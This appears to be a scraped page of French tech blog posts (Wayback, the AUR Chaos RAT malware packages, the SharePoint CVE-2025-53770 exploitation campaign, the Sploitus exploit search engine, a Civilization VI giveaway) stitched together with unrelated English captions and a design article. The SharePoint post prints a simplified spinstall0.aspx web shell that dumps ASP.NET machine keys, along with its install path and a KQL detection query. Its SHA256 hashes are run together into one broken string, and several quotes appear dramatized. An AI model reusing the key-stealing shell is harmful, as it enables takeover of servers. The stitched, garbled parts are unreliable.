Ça vous dirait de pouvoir faire tourner vos vieux window managers X11 préférés sur du Wayland moderne. Impossible ??? C’est ce que je pensais aussi avant de découvrir Wayback !
Pour ceux qui ne suivent pas trop l’actualité Linux, on est actuellement en pleine transition entre X11 (le vieux système d’affichage qui date de 1987) et Wayland (le nouveau qui est censé tout révolutionner). Le problème c’est que ça fait 35 ans qu’on développe des environnements de bureau pour X11, et avec Wayland, tout ça risquait de partir à la poubelle. Aux chiottes WindowMaker, Enlightenment, FVWM, et tous ces environnements qu’on adorait bidouiller.
Mais voilà qu’Ariadne Conill, une dev d’Alpine Linux, a eu une idée de génie. Au lieu de tout réécrire from scratch (ce qui prendrait des plombes), pourquoi ne pas créer une couche de compatibilité ? Et c’est exactement ce qu’est Wayback : un compositeur Wayland minimaliste qui sert juste à faire tourner Xwayland en mode “rootful”. En gros, ça fait croire à vos vieux environnements X11 qu’ils tournent sur un vrai serveur X, alors qu’en fait c’est du Wayland derrière.
Le truc vraiment smart, c’est que Wayback ne fait QUE le strict minimum. C’est pas un compositeur Wayland complet avec tous les effets 3D et compagnie. Non, c’est juste ce qu’il faut pour que Xwayland puisse faire son boulot. Du coup c’est léger, ça marche bien, et ça permet de garder tous nos vieux environnements de bureau vivants.
Alors attention, on est encore en version 0.1, donc c’est de l’alpha. Y’a pas le multi-écrans qui marche, pas de contrôle DPMS, et le verrouillage de souris ne fonctionne pas (donc oubliez les FPS pour l’instant). Mais franchement, pour un truc qui vient juste de sortir, c’est déjà super impressionnant.
D’ailleurs, le projet a été intégré dans l’écosystème FreeDesktop.org, ce qui est plutôt bon signe pour l’avenir. Ils ont même un canal IRC (#wayback sur Libera.Chat) avec un bridge Matrix si vous préférez. Et niveau packaging, c’est déjà dispo sur Alpine Linux (forcément), Arch AUR, Fedora, et même dans Nix.
Pour l’installer, c’est pas sorcier. Vous clonez le dépôt GitLab, vous compilez avec Meson, et hop. Les dépendances c’est du classique : Wayland, wlroots 0.19, et Xwayland 24.1 minimum. Une fois installé, au lieu de lancer startx, vous faites wayback-session et magie, votre vieil environnement X11 se lance via Wayland.
Ce qui est cool aussi, c’est l’architecture du truc. Ils ont découpé ça en trois composants : wayback-compositor (le compositeur Wayland minimal), Xwayback (qui remplace le binaire Xorg), et wayback-session (qui remplace startx). Du coup c’est super modulaire et ça s’intègre nickel dans un système existant. Bon par contre, faut pas se mentir, c’est pas encore prêt pour monsieur tout le monde. Mais si vous êtes du genre à avoir encore un vieux WindowMaker qui traîne quelque part ou si vous voulez préserver votre config FVWM de 2003 ou un vieux Enlightenment E16, c’est clairement un projet à suivre de près.
Quoiqu’il en soit, ça pourrait vraiment devenir LE moyen de transition entre X11 et Wayland, comme ça au lieu de forcer tout le monde à tout réécrire, on garde la compatibilité et on migre en douceur. Alpine Linux compte d’ailleurs déjà s’en servir pour réduire la maintenance du serveur X.org classique, et je parie que d’autres distros vont suivre.
Voilà, si vous voulez tester, toutes les infos sont sur le site officiel et le code source est sur GitLab.
Bon, là je vais pas y aller par quatre chemins : si vous avez installé certains packages sur l’AUR (Arch User Repository) ces derniers jours, vous avez peut-être un RAT (Remote Access Trojan) qui squatte tranquille sur votre machine sous Arch Linux. Et croyez-moi, c’est pas le genre de colocataire que vous voulez garder.
Le 16 juillet 2025 dernier, un utilisateur répondant au doux nom de “danikpapas” (compte maintenant banni, évidemment) a réussi à publier des malwares sur l’AUR. Ces saloperies sont restées en ligne pendant environ 48 heures avant que l’équipe de l’AUR ne s’en rende compte et vire tout ce bordel.
Les packages vérolés en question sont : librewolf-fix-bin, firefox-patch-bin et zen-browser-patched-bin. C’est vicieux car ces noms imitent volontairement les vrais packages légitimes (librewolf-bin, firefox-bin et zen-browser-bin) en ajoutant des mots comme “fix” ou “patched” qui donnent l’impression que c’est une version améliorée ou corrigée.
Faut reconnaître que le mec était pas con dans son approche car qui n’a jamais vu un package avec “fix” ou “patched” et s’est dit “ah tiens, ça doit être mieux que la version normale” ? C’est exactement sur ce réflexe qu’il a joué, le fourbe.
Mais attendez, c’est pas fini puisque 3 autres packages suspects ont aussi été dégagés : minecraft-cracked (là c’est clair, ça cible les gamins qui veulent jouer gratos), ttf-ms-fonts-all (qui fait croire que le package normal ttf-ms-fonts ne contient pas toutes les polices) et vesktop-bin-patched (Vesktop étant un client Discord populaire).
Le truc vraiment moche, c’est que ces packages installaient tous le même malware : Chaos RAT. Pour ceux qui ne connaissent pas, un RAT c’est un Remote Access Trojan, en gros un logiciel qui donne le contrôle total de votre machine à quelqu’un d’autre. Surveillance, installation d’autres malwares, vol de données… c’est open bar pour l’attaquant.
Et bien chaque package contenait dans son PKGBUILD une entrée “patches” qui pointait vers un dépôt GitHub contrôlé par l’attaquant (github.com/danikpapas/zenbrowser-patch.git, maintenant supprimé bien sûr) et au lieu d’appliquer de vrais patches, ce dépôt exécutait du code malveillant pendant l’installation.
Ce qui est dingue dans cette histoire, c’est que personne n’a rien vu pendant 2 jours. Les packages avaient même récolté 8 / 9 votes positifs ! C’est finalement grâce à Reddit que l’alerte a été donnée car un compte Reddit dormant depuis 3 ans (probablement compromis ou racheté) a commencé à faire la promo de ces packages sur r/archlinux avec un post intitulé “The AUR is awesome”.
Grave erreur stratégique du pirate pusique la communauté Arch sur Reddit, c’est pas des tendres. Ils ont direct flairé l’embrouille et ont commencé à creuser. Un utilisateur a balancé le package sur VirusTotal et boom : 32 antivirus sur 70 ont détecté le malware. Pas vraiment ce qu’on appelle un faux positif, hein.
Voilà, donc si vous avez installé un de ces packages, voici ce qu’il faut faire illico :
Connexion
pacman -R nom-du-packageAlors je vous vois venir : “Mais Korben, ça veut dire que l’AUR c’est dangereux et qu’il faut plus l’utiliser ?” Mais nooon, calmons-nous deux secondes mes amis.
L’AUR a toujours été ce qu’il est à savoir un dépôt communautaire avec très peu de modération. C’est un peu comme GitHub mais pour les packages Arch. Dans 99,9% des cas, tout va bien, mais oui, parfois des conneries comme ça peuvent arriver et c’est pas la première fois (en 2018 y’avait déjà eu un cas similaire).
Donc pour vous protéger à l’avenir, quelques conseils plein de bon sens :
Ce qui me fait chier dans cette histoire, c’est surtout la communication pourrie autour de l’incident car l’alerte officielle a uniquement été postée sur la mailing list de l’AUR. C’est tout… Et comme personne ne lit encore les mailing lists en 2025 et bien le post a récolté royalement 2 upvotes et a probablement été vu par 20 pelés et 3 tondus. Heureusement que le Discord communautaire d’Arch a relayé l’info, sinon on serait encore dans le brouillard.
Bref, pour finir sur une note positive, énorme respect à tous ceux qui ont détecté et signalé ces packages. C’est grâce à eux que l’attaque n’a duré “que” 48 heures, sinon on aurait probablement encore des gens qui installeraient ces merdes aujourd’hui.
Voilà, comme toujours avec les trucs communautaires, faut garder son cerveau allumé et si vous voyez un truc louche, signalez-le ! Même si vous n’êtes pas sûr à 100%, mieux vaut un faux positif qu’un vrai malware qui tourne pendant des semaines.
Allez, même si tous les médias vous gavent avec ça ces derniers jours, je vais quand même vous raconter l’histoire de la CVE-2025-53770, une faille SharePoint qui fait actuellement trembler Internet.
On est le 18 juillet dernier, c’est vendredi matin. Je suis tranquille posé en Bretagne, devant mon petit café, en train de scroller mes flux RSS comme d’hab. Et là, BAM ! Je vois un tweet d’un chercheur néerlandais qui me fait recracher mon café : “Quelque chose de très mauvais se passe avec SharePoint. Vérifiez vos logs. MAINTENANT.”
Du coup, je me dis “encore un qui a fumé la moquette”. Mais non. C’était le début d’une histoire qui commence avec un mec vietnamien super balèze, qui continue avec des hackers chinois vénères, et qui se finit avec des milliers d’entreprises qui chialent…
Mais pour vraiment comprendre ce bordel actuel, faut qu’on remonte le temps. Direction Berlin, mai 2025 pour le Pwn2Own. Cet événement, c’est LE truc où les meilleurs hackers du monde viennent casser du code pour de la thune. Les Jeux Olympiques du hacking si vous préférez, mais en plus stylé et sans le dopage. Dans la salle bondée, y’a un jeune vietnamien qui se pointe avec son laptop tout pourri. Son nom est Dinh Ho Anh Khoa, alias @_l0gg sur Twitter.
Le mec bosse pour Viettel Cyber Security, et c’est pas son premier rodéo mais cette fois, il a un truc de malade dans sa besace. Pendant des mois, ce génie a étudié SharePoint, vous savez, le machin de Microsoft que toutes les boîtes utilisent pour stocker leurs docs et faire semblant d’être organisées.
Et là, attention les yeux, en quelques minutes, Khoa déboîte complètement un serveur SharePoint. Sans mot de passe, sans rien. Juste avec UNE SEULE requête HTTP. Mdr ! Le jury n’en peut plus, et les autres participants sont sur le cul.
Comment a-t-il fait ? Et bien c’est simple (enfin, façon de parler). Il enchaîne deux bugs :
Résultat des courses, 100 000 dollars dans la popoche, 10 points Master of Pwn, et une standing ovation !! L’équipe Viettel finit alors avec un score parfait de 15,5/15,5. Ils sont deuxièmes au général, mais franchement, c’est la classe.
Plus tard, Khoa tweete avec la modestie d’un champion : “L’exploit nécessite une seule requête. Je l’appellerais ToolShell, ZDI a dit que l’endpoint était /ToolPane après tout.” Le mec vient de péter SharePoint et il fait des jeux de mots. J’adore.
SharePoint en PLS face à l’exploit de Khoa
Bon, maintenant on fait un petit saut dans le temps. On est le 14 juillet et Microsoft a sorti des patchs pour ces deux vulnérabilités. Tout le monde pense que c’est réglé. Spoiler alert : c’est pas réglé du tout.
Dans les bureaux de Code White GmbH en Allemagne, l’ambiance est électrique car les mecs viennent de faire un truc de ouf ! Ils ont reproduit l’exploit de Khoa et pas qu’un peu !
“Nous avons reproduit ‘ToolShell’, la chaîne d’exploit non authentifiée pour CVE-2025-49706 + CVE-2025-49704 utilisée par @_l0gg pour faire tomber SharePoint à #Pwn2Own Berlin 2025, c’est vraiment juste une requête !”, postent-ils sur Twitter, tout fiers.
Sauf que voilà, Code White c’est des gentils, mais dans l’ombre, y’a des méchants qui prennent des notes. Et eux, ils ne vont pas se contenter de twitter leur exploit…
Amsterdam, 18 juillet, 20h47. Les mecs d’Eye Security, une boîte néerlandaise spécialisée dans la détection de menaces, sont en train de surveiller Internet (ouais, c’est leur taf, surveiller TOUT Internet…). Un de leurs analystes lève la tête de son écran : “Euh les gars, j’ai des centaines de requêtes POST bizarres vers /layouts/15/ToolPane.aspx sur plein de serveurs SharePoint différents. Et le header Referer c’est /layouts/SignOut.aspx. C’est complètement con comme truc.”
Bah oui c’est con. Personne ne se déconnecte via ToolPane. C’est comme si on passait par la fenêtre pour sortir de chez soit alors que la porte est ouverte. Sauf que là, c’est pas pour sortir, c’est pour rentrer…
L’équipe d’Eye Security vient alors de découvrir en live une des plus grosses campagnes de cyberattaque de l’histoire. Ce qu’ils voient, c’est l’exploitation d’une NOUVELLE vulnérabilité zero-day : la CVE-2025-53770. Les hackers ont trouvé comment contourner les patchs de Microsoft. C’est un game over total.
Les chercheurs bossent alors toute la nuit comme des malades. Ils scannent plus de 8000 serveurs SharePoint dans le monde et le constat est terrifiant :
“C’était comme regarder un tsunami en temps réel”, racontera quelques jours plus tard un chercheur. “On voyait des dizaines de serveurs tomber toutes les heures. Et on pouvait rien faire à part regarder et prendre des notes.”
Mais alors qu’est-ce que les hackers déploient sur ces serveurs ? Et bien un truc très vicieux nommé spinstall0.aspx. Derrière ce nom tout pourri se cache une backdoor d’une ingéniosité diabolique car contrairement aux web shells classiques qui vous permettent d’exécuter des commandes (genre “del C:*.*” pour les nostalgiques du DOS), spinstall0.aspx n’a qu’UN SEUL but : voler les clés cryptographiques du serveur SharePoint.
Pour les non-techos, j’vous explique. Les clés crypto de SharePoint, c’est comme le moule pour fabriquer un pass pour votre immeuble. Une fois que vous avez le moule de ce pass, vous pouvez faire autant de doubles que vous voulez et même si le proprio d’un appart change sa serrure, vous avez toujours le moule pour faire des pass, donc vous pouvez l’ouvrir.
Techniquement, ça ressemble à ça (version simplifiée pour pas vous faire peur) :
// spinstall0.aspx - Le cauchemar de tout admin SharePoint
using System.Web;
using System.Reflection;
// On charge les trucs secrets de Windows
Assembly assembly = Assembly.Load("System.Web");
// On utilise la magie noire de la réflexion .NET
MethodInfo getConfig = assembly.GetType("System.Web.Configuration.MachineKeySection")
.GetMethod("GetApplicationConfig", BindingFlags.NonPublic | BindingFlags.Static);
// On pique les clés crypto
MachineKeySection config = (MachineKeySection)getConfig.Invoke(null, null);
// Et hop, on les affiche tranquille
Response.Write("ValidationKey: " + config.ValidationKey);
Response.Write("DecryptionKey: " + config.DecryptionKey);
// Bisous, on se revoit plus tard avec vos clés ;)
Les chercheurs de Check Point ont identifié les signatures SHA256 du malware (pour ceux qui veulent jouer aux détectives) :
92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a51427c45b8ed7b8a7e5fff473b50c24028bd028a9fe8e25e5cea2bf5e676e5310148d3d3f3a17d233bc8562765e61f7314ca7a08130ac0fb153ffd091612920b0f2Et le fichier est généralement planqué ici :
C:\PROGRA~1\COMMON~1\MICROS~1\WEBSER~1\16\TEMPLATE\LAYOUTS\spinstall0.aspx
Hé oui, ils utilisent encore les noms courts DOS. En 2025, c’est ça le niveau expert !
22 juillet, Redmond, Washington. Vous vous en doutez, chez Microsoft c’est la panique totale. Le MSRC (Microsoft Security Response Center) est en mode DEFCON 1 et les mecs dorment plus et ne mangent plus…non, ils codent et analysent H24 tout ce qui se passe.
Et là, les analystes du Microsoft Threat Intelligence font une découverte qui fout les jetons… Ce ne sont pas des script kiddies qui attaquent. C’est carrément des groupes étatiques chinois. Du lourd. Du très lourd.
Microsoft identifie ainsi 3 acteurs principaux (ils leur donnent des noms de typhons, c’est plus classe que “Hacker Chinois N°3”) :
Linen Typhoon (alias APT27 ou Emissary Panda) : Ces mecs sont dans le game depuis 2012 et leur spécialité c’est de voler de la propriété intellectuelle. Ils adorent taper dans les ambassades et les organisations gouvernementales. Bref, ils veulent savoir ce que tout le monde mijote.
Violet Typhoon : Apparus en 2015, ces gars ciblent les anciens militaires, les ONG, les think tanks et les universités. Et leur kiff c’est de collecter du renseignement. Ils veulent savoir qui pense quoi et qui fait quoi.
Storm-2603 : Ce sont les plus mystérieux du lot. Basés en Chine mais sans liens connus avec d’autres groupes, ces mecs déploient parfois des ransomwares Warlock et Lockbit. Il sont mi-espions, mi-rançonneurs. Dans le pire des deux mondes, quoi.
“C’est la première fois qu’on voit 3 groupes d’État-nation différents exploiter la même zero-day en même temps”, confie un analyste Microsoft. “D’habitude ils se marchent sur les pieds, là ils étaient coordonnés. C’est flippant.”
19 juillet, minuit. Chez Microsoft c’est toujours la course contre la montre car chaque heure qui passe, c’est des dizaines de nouveaux serveurs pwned. La pression est énorme. Les devs sont s, les managers pètent des câbles, et le PDG appelle toutes les heures. Le problème est complexe car la CVE-2025-53770 c’est pas juste un bug, c’est un contournement des patchs précédents.
L’équipe SharePoint bosse alors sur plusieurs fronts :
Mais pendant ce temps, les chiffres des compromissions explosent. The Washington Post rapporte que des agences fédérales US, des compagnies énergétiques, des universités prestigieuses et même des opérateurs télécom asiatiques se sont fait avoir. C’est le carnage total !!
20 juillet, dimanche matin. Microsoft fait un truc qu’ils ne font jamais : sortir des patchs un dimanche. Mais là c’est la guerre, alors il faut agir vite.
Et ils balancent tout d’un coup :
Voici la requête KQL pour les curieux :
DeviceFileEvents
| where FolderPath has "MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS"
| where FileName =~ "spinstall0.aspx" or FileName has "spinstall0"
| project Timestamp, DeviceName, InitiatingProcessFileName,
InitiatingProcessCommandLine, FileName, FolderPath,
ReportId, ActionType, SHA256
| order by Timestamp desc
// Si ça retourne des résultats, vous êtes dans la mouise
Mais Microsoft va plus loin car dans leur advisory, ils lâchent une bombe : “Appliquer les patches ne suffit pas. Vous DEVEZ changer vos clés ASP.NET et redémarrer IIS.”
Traduction : même si vous patchez, si les hackers ont déjà volé vos clés, vous êtes toujours dans la merde. Il faut donc tout changer… Les serrures ET les clés.
Le même jour, la CISA américaine ajoute la CVE-2025-53770 à sa liste des vulnérabilités activement exploitées. Les agences fédérales ont alors 24h pour patcher. Pour une administration, c’est comme demander à un escargot de courir un 100m. Et puis surtout c’est trop tard car le 21 juillet, des proof-of-concept apparaissent sur GitHub. N’importe quel gamin avec 2 neurones peut maintenant exploiter la faille. C’est Noël pour les script kiddies.
SentinelOne rapporte même que leurs honeypots (des faux serveurs pour attraper les hackers) détectent des MILLIERS de tentatives par heure. C’est l’apocalypse numérique. SOCRadar balance aussi des chiffres qui font mal. Et un simple scan Shodan révèle l’exposition mondiale :
Au total, plus de 16 000 serveurs SharePoint sont exposés sur Internet et 8 000 sont vulnérables. Des banques, des hôpitaux, des gouvernements… Tout le monde y passe. Rapid7 sort également une analyse qui fait froid dans le dos : certaines organisations se sont fait compromettre en moins de 4 MINUTES après exposition. 4 minutes ! C’est le temps de se faire un café et boom, c’est hacké.
Alors qu’est-ce qu’on retient de ce bordel monumental ? Et bien plusieurs trucs importants :
Et l’histoire n’est pas finie car pendant que j’écris ces lignes, des milliers d’organisations vérifient leurs logs en mode panique. Elles appliquent les patchs, changent leurs clés, et prient pour pas être dans la liste des victimes. Dinh Ho Anh Khoa, notre hacker vietnamien du début a même déclaré : “J’aurais jamais imaginé que ma découverte aurait de telles conséquences. Mon but c’était d’améliorer la sécurité, pas de déclencher une cyberguerre mondiale.”
Te tracasse pas trop mon gars, ça aurait fini par arriver de toute manière… Là au moins, on est au courant. Et surtout Microsoft a annoncé des changements majeurs dans SharePoint : Plus d’audits, une meilleure séparation des privilèges, et tout le tralala. On verra si ça suffit pour la prochaine fois.
Voilà, c’est ça Internet… On est tous connectés pour le meilleur et surtout pour le pire… Donc si vous bossez dans l’IT et que vous avez SharePoint, allez vérifier vos logs. Genre maintenant hein. Tout de suite là. Et changez vos clés crypto aussi. On sait jamais.
À bon entendeur !
Sources : The Hacker News - Microsoft Links Ongoing SharePoint Exploits to China State Actors, The Hacker News - CISA Orders Urgent Patching After SharePoint Zero-Day, Microsoft Security Blog - Disrupting Active Exploitation, Eye Security - SharePoint Under Siege, MSRC - Customer Guidance, CISA - CVE-2025-53770 Added to Catalog
Si vous bossez dans la sécu ou que vous êtes juste curieux de comprendre comment fonctionnent les vulnérabilités, je vais vous parler d’un outil qui va vous changer la vie : Sploitus. C’est comme Google mais pour trouver des exploits sécu et avec un crâne-pieuvre en logo.
Créé par Anton “Bo0om” Lopanitsyn, un chercheur en sécurité web basé à Moscou, Sploitus est devenu LA référence pour trouver rapidement des exploits, des proof-of-concepts et des outils de hacking. Le site indexe en temps réel tout ce qui sort dans le domaine de la sécurité offensive et ça, c’est vraiment pratique quand vous devez vérifier si un système est vulnérable.
Sur sploitus.com, vous avez une barre de recherche toute simple dans laquelle vous pouvez chercher par nom de logiciel, par CVE (Common Vulnerabilities and Exposures), par type d’exploit ou même par auteur. Et le moteur va alors fouiller dans sa base de données massive et vous sortir tous les exploits pertinents.
Ce qui est cool avec Sploitus, c’est qu’il agrège plusieurs sources. On y trouve des exploits venant d’Exploit-DB, de GitHub, de Packet Storm, et plein d’autres plateformes. Comme ça au lieu de perdre du temps à chercher sur 15 sites différents, vous avez tout centralisé au même endroit et cerise sur le gâteau, les résultats sont triables par date ou par score de pertinence.
Pour chaque exploit, vous avez donc accès à pas mal d’infos utiles : la description détaillée, le code source (quand il est dispo), les plateformes affectées, et surtout un lien vers la source originale. C’est super important ça, parce que vous pouvez vérifier l’authenticité de l’exploit et voir s’il y a des mises à jour ou des commentaires de la communauté.
Le site propose aussi des flux RSS et Atom si vous voulez suivre en temps réel les nouveaux exploits qui sortent. C’est donc super pratique si comme moi, vous faites de la veille techno ou pour surveiller les vulnérabilités qui touchent vos systèmes. Y’a même un mode sombre pour ceux qui préfèrent coder la nuit (ou qui veulent juste faire plus hacker ^^).
Ah et petit détail sympa, des développeurs ont créé des scripts Python pour interroger Sploitus en ligne de commande. Le projet sploitus-search sur GitHub permet par exemple d’intégrer les recherches Sploitus directement dans vos outils de pentest. C’est super pratique par exemple pendant les CTF ou les audits de sécurité.
Maintenant, parlons un peu de l’aspect légal et éthique, parce que c’est aussi très important. Sploitus a eu par le passé quelques soucis avec des plaintes DMCA, notamment concernant un exploit WordPress, mais globalement, le site reste dans la légalité en tant que moteur de recherche qui indexe du contenu public.
CEPENDANT, les exploits référencés sur Sploitus sont des outils puissants qui peuvent causer des dégâts considérables s’ils sont mal utilisés. L’utilisation de ces exploits sur des systèmes dont vous n’êtes pas propriétaire ou sans autorisation explicite est illégale et peut vous valoir de sérieux problèmes judiciaires. Et ne comptez pas sur moi pour vous apporter des oranges en prison !
Ces outils sont donc destinés aux professionnels de la sécurité pour :
Voilà, donc si vous débutez dans le domaine, je vous conseille fortement de vous former d’abord aux bases de la sécurité informatique et de toujours travailler dans un environnement de test isolé.
D’ailleurs, Sploitus n’est pas le seul dans son genre. Vous avez aussi Exploit-DB qui propose SearchSploit en ligne de commande pour les recherches hors ligne, ou encore la base de données CVE officielle du MITRE. Mais l’avantage de Sploitus, c’est vraiment cette agrégation de sources multiples et cette interface web simple et efficace.
Voilà… Et n’oubliez jamais que le but de ce genre d’outils, c’est de sécuriser les systèmes, pas de les compromettre.
Bon, j’ai une super nouvelle pour les fans de stratégie et ceux qui cherchent un nouveau jeu chronophage : Epic Games Store balance enfin du lourd pour son Summer Sale 2025 en offrant Civilization VI Platinum Edition gratuitement ! Et attention, l’offre se termine le 24 juillet à 17h (heure française), donc faut pas traîner.
Et le plus cool, c’est qu’ils n’offrent pas juste le jeu de base comme en 2020. Non non, là c’est la version Platinum complète avec toutes les extensions majeures et 6 packs de DLC. Valeur normale : 80 dollars. Et là c’est gratuit. Zéro. Nada. C’est Noël en juillet !
Pour ceux qui vivent dans une grotte, Civilization VI c’est LE jeu de stratégie 4X par excellence. Les 4X c’est quoi ? eXplore, eXpand, eXploit, eXterminate. En gros, vous prenez une civilisation de l’âge de pierre avec juste un colon et un guerrier, et vous la guidez jusqu’à l’ère spatiale. Ou jusqu’à la domination mondiale. Ou jusqu’à une victoire culturelle. Bref, vous avez le choix.
Le truc avec Civ VI, c’est que c’est addictif comme pas permis. C’est le genre de jeu où vous vous dites “allez, encore un tour” et hop, vous levez la tête, il est 4h du mat et vous n’avez plus de café. Mais quelle satisfaction quand votre empire s’étend sur trois continents et que Gandhi vous menace avec ses bombes nucléaires (oui, c’est un des running gag de la série). Comme tous les Civ, cet opus reste une référence absolue du genre.
Ah et j’oubliais les 6 packs de civilisations inclus ! Vikings menés par Harald Hardrada, la Pologne de Jadwiga, l’Australie avec John Curtin, la Perse de Cyrus, la Macédoine d’Alexandre le Grand, la Nubie d’Amanitore, et enfin le Khmer et l’Indonésie. Chaque civilisation a ses propres unités, bâtiments uniques et bonus qui changent complètement votre façon de jouer.
Le gameplay de Civ VI est hyper profond sans être inaccessible et la grande nouveauté par rapport aux anciens Civ, c’est le système de districts. Au lieu d’empiler tous vos bâtiments dans le centre-ville, vous devez construire des quartiers spécialisés autour : campus pour la science, théâtre pour la culture, zone industrielle pour la production, etc. Ça ajoute une dimension puzzle super intéressante où le placement de vos villes devient crucial.
Vous devez aussi jongler avec 2 arbres de progression : les technologies classiques (de la roue aux robots géants de la mort) et l’arbre des dogmes sociaux qui débloque des gouvernements, des politiques et des bonus culturels. Chaque techno a également son moment “Eureka”, une mini-quête qui accélère la recherche. Genre construire une ville côtière pour booster la navigation…etc.
Pour les débutants qui flipperaient devant la complexité, pas de panique, puisque le jeu a un tutoriel intégré super bien fait et surtout la Civilopedia, une encyclopédie in-game qui explique absolument tout. C’est le gros point d’interrogation en haut de l’écran, votre meilleur ami pour comprendre les mécaniques.
Allez, je vais quand même vous donner quelques conseils de base pour bien démarrer : installez votre première ville près de l’eau fraîche (rivière, lac, oasis) pour le housing qui limite votre croissance de population. Explorez rapidement avec votre éclaireur pour trouver des villages tribaux (bonus gratuits), des merveilles naturelles et des cités-états. Et surtout, développez plusieurs villes rapidement plutôt qu’une seule mégalopole.
Le jeu propose 5 conditions de victoire, donc vous avez vraiment le choix de votre style. Domination militaire en conquérant toutes les capitales, victoire scientifique en partant coloniser Mars, victoire culturelle en devenant LA destination touristique mondiale, victoire religieuse en convertissant le monde entier, ou victoire diplomatique en gagnant des points au congrès mondial.
Bon par contre, petite déception pour certains, c’est uniquement pour Windows sur Epic. Pas de version Mac ou Linux dans cette offre. Et attention aussi, le New Frontier Pass qui ajoute encore plus de civilisations et de modes de jeu n’est pas inclus, c’est vendu séparément mais pour du gratuit, on va pas faire la fine bouche.
C’est quand même cool de voir que le jeu continue d’être supporté en 2025. Aspyr a sorti une grosse mise à jour en juin pour la version Android avec des pools de leaders personnalisables et Jules César comme nouveau leader pour Rome. Et même avec la sortie de Civilization VII, le VI reste ultra actif avec une communauté de moddeurs dingue.
Pour récupérer votre copie gratuite, c’est simple : foncez sur l’Epic Games Store avant le 24 juillet 11h ET (17h heure française). Cherchez Civilization VI Platinum Edition dans la section jeux gratuits, cliquez sur “Obtenir”, et c’est dans la poche. Sinon, vous cliquez ici, ce sera encore plus rapide ^^.
Une fois dans votre bibliothèque, c’est à vie, même si vous l’installez dans 3 ans.
Petite astuce, même si vous avez déjà le jeu de base (sur Steam par exemple), ça vaut quand même le coup de le chopper sur Epic pour les extensions car Rise and Fall et Gathering Storm coûtent encore cher vendues séparément, donc c’est vraiment une affaire en or.
Je vous préviens quand même juste, préparez-vous à perdre des heures de sommeil car ce truc est plus addictif que de manger des chips devant Netflix. Mais quel kiff !
Alors foncez, c’est vraiment LE bon plan gaming de la semaine. Et si vous hésitez, encore une fois, c’est gratuit et surtout, ça tourne sur des configs modestes (une HD 7970 de 2012 suffit) donc ne vous privez pas !
Xbox at Gamescom 2022
Call of Duty: Black Ops 7 promotional images.
Xbox Ally
Ugreen Genshin Impact charging accessories
Xbox Game Pass Core voucher on a gradient background for an Amazon Prime Day deal.
Xbox Gift Card floating in the air with green fireworks going off in the background.
If you’re one of those people who drags themselves home after a long day, feeling like you’ve been running on empty for hours, you’re not alone. The constant cycle of work stress, endless meetings, and the pressure to always be “on” can leave anyone feeling drained. But what if there was a simple, elegant solution that could help you reclaim those precious moments of peace? Enter Recov, a revolutionary incense burner concept that’s designed specifically for people like you who desperately need to rediscover the value of rest.
Created by the talented design team of Ko Ye Been, Lee Ji Ho, Roh Woo Hyun, and Oh Yun, Recov isn’t just another home accessory. It’s a thoughtfully crafted wellness tool that transforms the ancient practice of incense burning into a modern ritual for recovery and relaxation. The tagline “Discover the value of rest” perfectly captures what this innovative product aims to achieve: making rest not just an afterthought, but a deliberate, mindful practice.
Designers: Ko Ye Been, Lee Ji Ho, Roh Woo Hyun, and Oh Yun
The design itself is refreshingly simple yet sophisticated. The clean, minimalist aesthetic features a warm cream-colored body with subtle orange accents that immediately feel calming and approachable. Unlike traditional incense burners that can feel ceremonial or intimidating, Recov looks like it belongs in your contemporary living space. The cylindrical form with its gentle curves and soft lighting creates an atmosphere that whispers “slow down” rather than demanding attention.
What makes Recov truly special is how it reimagines the entire incense experience. Instead of fumbling with matches and worrying about timing, you simply insert an incense stick into the top opening, set your desired duration using the intuitive timer system (15, 30, or 60 minutes), and let the device do the rest. The soft mood lighting gradually illuminates as the incense burns, creating a visual cue that helps your mind transition from work mode to rest mode. The thoughtful engineering extends to practical details that busy people will appreciate. The bottom tray collects ash automatically, eliminating the mess and maintenance that often deters people from using traditional incense. The timer function means you can start your relaxation ritual and trust that it will end safely, allowing you to fully let go without worrying about fire hazards or waste.
But perhaps the most brilliant aspect of Recov is how it makes rest feel intentional rather than guilty. In our productivity-obsessed culture, taking time to simply breathe and be present can feel selfish or lazy. By creating a structured, time-bound experience, Recov gives you permission to pause. It transforms those stolen moments of peace into a legitimate wellness practice, complete with sensory cues that signal to your brain that it’s time to decompress. The accompanying incense options, including “Calm Flow,” “Rest Bloom,” and “Inner Goals,” are specifically formulated to support different aspects of recovery. Whether you need to quiet racing thoughts after a stressful presentation or create a buffer between work and personal time, there’s a scent designed to help you transition more effectively.
The post Recov concept lets you relax with incense and without guilt first appeared on Yanko Design.
Éjecté de notre dernier boulot, perdu sur une barque au milieu de l’océan, on se dit que rien ne pourrait être pire… Jusqu’à ce qu’on se retrouve aspiré dans un genre de “puits” naturel dans lequel il semble impossible de sortir. Ça commence bien !
Heureusement, d’autres bateaux sont coincés, et on est mécanos : réparons tout ça et faisons remonter le niveau de l’eau pour s’en sortir. 🐸 Bienvenue dans Sea Frog, un mélange de Metroid et de Tony Hawk, en 2D super choupi. 🤩
Vous jonglez entre Firefox, Chrome et trois autres navigateurs, et vos favoris sont éparpillés partout ? Gosuki vient de sortir et c’est exactement l’outil qu’il vous faut ! Il s’agit d’un gestionnaire de bookmarks qui surveille TOUS vos navigateurs en temps réel, sans extension ni cloud.
Développé par blob42, ce projet open source règle un problème qu’on a tous à savoir l’impossibilité de gérer efficacement ses favoris quand on utilise plusieurs navigateurs. Et entre nous, qui n’a pas Firefox pour le perso, Chrome pour le boulot, et peut-être Qutebrowser pour faire le geek ?
Vous en avez marre de Google News, de ses bulles de filtre et de ses articles de merde écrit par IA ? Et bien sachez qu’il y a un mec en France qui a développé Meta-Press.es, un moteur de recherche de presse décentralisé qui tourne directement dans votre Firefox. Zéro tracking, zéro pub, et ça cherche dans 900 journaux d’un coup.
Simon Descarpentries, développeur basé dans les Deux-Sèvres et patron de la société de services en logiciels libres Acoeuro, a pondu cette extension après avoir bossé pendant 5 ans sur les revues de presse pour La Quadrature du Net et le résultat est bluffant.
Vous savez ce qui manquait vraiment à Internet ? La possibilité de coller un Mac System 1.0 de 1984 dans n’importe quelle page web. Et bien c’est maintenant possible grâce à Mihai Parparita, le génie derrière Infinite Mac, qui vient de sortir une fonctionnalité qui va faire kiffer tous les nostalgiques et les passionnés d’histoire informatique.
